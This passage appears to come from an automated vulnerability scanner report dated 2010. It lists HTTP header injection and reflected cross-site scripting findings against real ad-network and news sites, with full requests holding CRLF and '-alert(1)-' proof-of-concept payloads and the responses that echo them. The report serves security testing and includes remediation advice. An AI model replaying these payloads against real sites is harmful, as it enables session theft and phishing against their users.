GET /4a5bc%0d%0addcf24c3ec4/N5687.135388.BIZO/B4978163.5 HTTP/1.1
Host: vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|685973/842351/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4a5bc
ddcf24c3ec4/N5687.135388.BIZO/B4978163.5:
Date: Mon, 22 Nov 2010 23:35:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.44. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f01f1%0d%0a535b8ac1693 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0f01f1%0d%0a535b8ac1693; F1=00UilH0003sY9PGI; A2=dtA69MH60aVX0000820wrMetid9Qa903Gz9Qa961worWez3M9MXe05qO9MXhe3wUrNeQyI9KVU0bnA0000820wrHeT709LaB0a4c9KVBK42UrIei.Q9EyK07ft0000o61wrpfpuV9Qat0bKd0000g410rWePZ99P6K07l00000g210rTedj59B6M09Gc0000820wrffhPu9MHD0bnA0000820wrMff3e9P0S03sY0000820wrTe1YN9KVH08te0000820wrHdtFJ9MH60aVX0000820wrMf2Ca9KVJ02Hn0000820wrHeT809KVD0a4c9KVEm5xorHeC519MH60aVX00008y8yrMf5Kg9KTC07g60000820wrHedd99KVI077T0000820wrHewrC9P6K0bfD0000820wrT; B2=7grL0820wrH6VCF0820wrf6SKe0820wrH7hMi0m5xorH76AK0e3wUrN7nwv0820wrH6V2p0820wrH745g061worW7yh30g410rW5suX0g210rT7nig0820wrH70vL0o61wrp74..0820wrT7luQ0820wrM6UUT0820wrT6E4C0gA92rM7hMh0K42UrI6E4D0820wrM; E2=0aVXoC9yrM07l0g210rT077T820wrH08te820wrH03sY820wrT0a4cS43orI07fto61wrp02Hn820wrH03Gz61worW05qOe3wUrN09Gc820wrf0bKdg410rW0bfDe3wUrT0bnAg410rM07g6820wrH; u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; C3=0ppCg210rT0000001_0sJzoC9yrM0200000_0vq9g410rW0000001_0t+c820wrT000000g_0u3Je3wUrN0000020_0uv2820wrH0000001_0u6F820wrM0000040_0tIT820wrH0000080_0tUC820wrT0008000_0uf9820wrH0000w00_0tUd820wrH0000001_0sTh820wrf0000001_0uXiS43orI0000002_0upO61worW0000000_0uRt820wrH00000g0_0t8ko61wrp0000w00_; ActivityInfo=000ltNb65%5f; u3=1; D3=0upO009p61worW0sJz02lBoC9yrM0vq905Zwg410rW0t8k00iZo61wrp0u3J01B9e3wUrN0tIT00cN820wrH0uXi00Y3S43orI0tUC0053820wrT0t+c00iZ820wrT0u6F004H820wrM0tUd001N820wrH0ppC00iZg210rT0uRt03HD820wrH0uf900EM820wrH0sTh00ai820wrf0uv201xc820wrH;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=1259&BWDate=40494.848912&debuglevel=&FLV=10.1103&RES=128&WMPV=0f01f1
535b8ac1693; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=d40d05dc-9ee9-4d31-923b-440dda2f03473EI03g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close

1.45. http://link.decideinteractive.com/n/23445/23721/www.news.com.au/e0dce9fe002503000000000600000000034ccf0c0000000000000000000000000000000100/i/c [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://link.decideinteractive.com
Path:	/n/23445/23721/www.news.com.au/e0dce9fe002503000000000600000000034ccf0c0000000000000000000000000000000100/i/c

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload ce41b%0d%0ab2a05928c52 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/23445/23721/ce41b%0d%0ab2a05928c52/e0dce9fe002503000000000600000000034ccf0c0000000000000000000000000000000100/i/c HTTP/1.1
Host: link.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=9272912040626753445; name=9272912040626754509; %2edecideinteractive%2ecom/%2fn%2f23445/2/e=1290469849/23445/23721/0/0//0///0/0/0/0///0/0//0//0/0;

Response

HTTP/1.1 302 Found
Date: Tue, 23 Nov 2010 00:01:31 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Tue, 23 Nov 2010 00:01:31 GMT
location: http://ce41b
b2a05928c52
Set-Cookie: id=9272912040626753445; expires=Wed, 23-Nov-2011 00:01:31 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912040626754509; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

2. Cross-site scripting (reflected) previous
There are 134 instances of this issue:

http://a.collective-media.net/adj/bzo.361/L12_4858519 [REST URL parameter 2]
http://a.collective-media.net/adj/bzo.361/L12_4858519 [REST URL parameter 3]
http://a.collective-media.net/adj/bzo.361/L12_4858519 [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [REST URL parameter 2]
http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [REST URL parameter 3]
http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [name of an arbitrarily supplied request parameter]
http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [campID parameter]
http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [crID parameter]
http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [partnerID parameter]
http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [pub parameter]
http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [pubICode parameter]
http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [sz parameter]
http://vulnerable.ad.partner/adi/N4270.154361.33ACROSS.COM/B4882358.3 [url parameter]
http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [campID parameter]
http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [crID parameter]
http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [partnerID parameter]
http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [pub parameter]
http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [pubICode parameter]
http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [sz parameter]
http://vulnerable.ad.partner/adi/N4390.aod-invite.comOX15921/B4977097.2 [url parameter]
http://ad.turn.com/server/pixel.htm [fpid parameter]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1075762926@Position4 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_Home/index.html/1862226389@Position4 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1407984949@Right1 [REST URL parameter 7]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 4]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 5]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 6]
http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1934160555@Right1 [REST URL parameter 7]
http://b.collective-media.net/adj/bzo.361/L2_4985265 [REST URL parameter 2]
http://b.collective-media.net/adj/bzo.361/L2_4985265 [REST URL parameter 3]
http://b.collective-media.net/adj/bzo.361/L2_4985265 [name of an arbitrarily supplied request parameter]
http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [REST URL parameter 2]
http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [REST URL parameter 3]
http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [name of an arbitrarily supplied request parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter]
http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter]
http://digg.com/submit [REST URL parameter 1]
http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1692524740@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/DLX/1654173699@x95 [name of an arbitrarily supplied request parameter]
http://ib.adnxs.com/ab [cnd parameter]
http://ib.adnxs.com/ab [referrer parameter]
http://ib.adnxs.com/ab [tt_code parameter]
http://ib.adnxs.com/if [cnd parameter]
http://mig.nexac.com/2/B3DM/DLX/11473864102@x96 [REST URL parameter 2]
http://mig.nexac.com/2/B3DM/DLX/11473864102@x96 [REST URL parameter 3]
http://mig.nexac.com/2/B3DM/DLX/11473864102@x96 [REST URL parameter 4]
http://mycareer.com.au/ [name of an arbitrarily supplied request parameter]
http://perthnow.realestate.com.au/cgi-bin/rsearch [REST URL parameter 1]
http://perthnow.realestate.com.au/cgi-bin/rsearch [REST URL parameter 2]
http://perthnow.realestate.com.au/cgi-bin/rsearch [name of an arbitrarily supplied request parameter]
http://rtb1.doubleverify.com/rtb.ashx/verifyc [callback parameter]
https://shop.bubble.com/preview/weekahead/ [name of an arbitrarily supplied request parameter]
http://totalratings.community.theplatform.com/totalrating/metadata/TotalRating [REST URL parameter 1]
http://totalratings.community.theplatform.com/totalrating/metadata/TotalRating [REST URL parameter 2]
http://redcated/CNT/iview/194067505/direct [REST URL parameter 4]
http://redcated/CNT/iview/194067505/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/194067505/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/194067505/direct [name of an arbitrarily supplied request parameter]
http://redcated/CNT/iview/194067505/direct [wi.728;hi.90/01?click parameter]
http://redcated/CNT/iview/194067505/direct [wi.728;hi.90/01?click parameter]
http://redcated/CNT/iview/194067505/direct [wi.728;hi.90/01?click parameter]
http://redcated/ER1/jview/257494277/direct/01 [REST URL parameter 4]
http://redcated/ER1/jview/257494277/direct/01 [click parameter]
http://redcated/ER1/jview/257494277/direct/01 [click parameter]
http://redcated/ER1/jview/257494277/direct/01 [name of an arbitrarily supplied request parameter]
http://redcated/ER1/jview/257494277/direct/01 [name of an arbitrarily supplied request parameter]
http://redcated/M0N/iview/263234194/direct [REST URL parameter 4]
http://redcated/M0N/iview/263234194/direct [name of an arbitrarily supplied request parameter]
http://redcated/M0N/iview/263234194/direct [name of an arbitrarily supplied request parameter]
http://redcated/M0N/iview/263234194/direct [name of an arbitrarily supplied request parameter]
http://redcated/M0N/iview/263234194/direct [wi.728;hi.90/01?click parameter]
http://redcated/M0N/iview/263234194/direct [wi.728;hi.90/01?click parameter]
http://redcated/M0N/iview/263234194/http:/ad.yieldmanager.com/clk [REST URL parameter 4]
http://www.investsmart.com.au/managed-funds/top-managed-funds.asp [name of an arbitrarily supplied request parameter]
http://www.investsmart.com.au/share_trading/one_off_sale.asp [name of an arbitrarily supplied request parameter]
http://www.rsvp.com.au/index.jsp [REST URL parameter 1]
http://www.y-jesus.com/jesuscomplex_1_x.php [name of an arbitrarily supplied request parameter]
http://mycareer.com.au/ [User-Agent HTTP header]
http://mycareer.com.au/7739281 [User-Agent HTTP header]
http://mycareer.com.au/7742934 [User-Agent HTTP header]
http://mycareer.com.au/7748366 [User-Agent HTTP header]
http://mycareer.com.au/7748561 [User-Agent HTTP header]
http://mycareer.com.au/jobs [User-Agent HTTP header]
http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [cli cookie]
http://b.collective-media.net/cmadj/bzo.361/L2_4985265 [cli cookie]
http://compare.smh.com.au/activity/record_gts2 [REST URL parameter 1]
http://compare.smh.com.au/activity/record_gts2 [REST URL parameter 2]
http://compare.smh.com.au/activity/record_sl [REST URL parameter 1]
http://compare.smh.com.au/activity/record_sl [REST URL parameter 2]
http://compare.smh.com.au/business/key-leaders/ [REST URL parameter 1]
http://compare.smh.com.au/business/key-leaders/ [REST URL parameter 2]
http://compare.smh.com.au/home-loans [REST URL parameter 1]
http://compare.smh.com.au/javascripts/base_fairfax_6894.js [REST URL parameter 1]
http://compare.smh.com.au/javascripts/base_fairfax_6894.js [REST URL parameter 2]
http://compare.smh.com.au/javascripts/fabtabulous.js [REST URL parameter 1]
http://compare.smh.com.au/javascripts/fabtabulous.js [REST URL parameter 2]
http://compare.smh.com.au/javascripts/modernizr-1.1.min.js [REST URL parameter 1]
http://compare.smh.com.au/javascripts/modernizr-1.1.min.js [REST URL parameter 2]
http://compare.smh.com.au/stylesheets/radius.css [REST URL parameter 1]
http://compare.smh.com.au/stylesheets/radius.css [REST URL parameter 2]
http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7858/12593/22707-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7858/12593/22707-2.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/7858/12593/22707-9.js [ruid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://a.collective-media.net/adj/bzo.361/L12_4858519 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.361/L12_4858519

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99df6'-alert(1)-'305152990e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.36199df6'-alert(1)-'305152990e4/L12_4858519 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 422
Date: Mon, 22 Nov 2010 23:35:19 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 22-Dec-2010 23:35:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.36199df6'-alert(1)-'305152990e4/L12_4858519;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.2. http://a.collective-media.net/adj/bzo.361/L12_4858519 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.361/L12_4858519

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 950d9'-alert(1)-'4fc1d2a9bde was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.361/L12_4858519950d9'-alert(1)-'4fc1d2a9bde HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 422
Date: Mon, 22 Nov 2010 23:35:19 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 22-Dec-2010 23:35:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.361/L12_4858519950d9'-alert(1)-'4fc1d2a9bde;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.3. http://a.collective-media.net/adj/bzo.361/L12_4858519 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.361/L12_4858519

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b829b'-alert(1)-'18bc356f0d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.361/L12_4858519?b829b'-alert(1)-'18bc356f0d0=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 425
Date: Mon, 22 Nov 2010 23:35:19 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Wed, 22-Dec-2010 23:35:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.361/L12_4858519?b829b'-alert(1)-'18bc356f0d0=1;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.4. http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.361/L12_4858519

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23715'-alert(1)-'3932912f30a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.36123715'-alert(1)-'3932912f30a/L12_4858519 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7420
Date: Mon, 22 Nov 2010 23:35:19 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-33421497_1290468919","http://ad.doubleclick.net//bzo.36123715'-alert(1)-'3932912f30a/L12_4858519;net=bzo;u=,bzo-33421497_1290468919,11bbcecf1d09b9d,none,bzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_
...[SNIP]...

2.5. http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.361/L12_4858519

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d79f4'-alert(1)-'24e6cfaf26d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.361/L12_4858519d79f4'-alert(1)-'24e6cfaf26d HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; gce=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7420
Date: Mon, 22 Nov 2010 23:35:19 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-97019505_1290468919","http://ad.doubleclick.net//bzo.361/L12_4858519d79f4'-alert(1)-'24e6cfaf26d;net=bzo;u=,bzo-97019505_1290468919,11bbcecf1d09b9d,none,bzo.automotive_l-bzo.finance_m-bzo.d8n-bzo.e6d-bzo.h3i-bzo.qfpoub-cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.ent_l-cm.sports_h-cm.none_h;
...[SNIP]...

2.6. http://a.collective-media.net/cmadj/bzo.361/L12_4858519 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
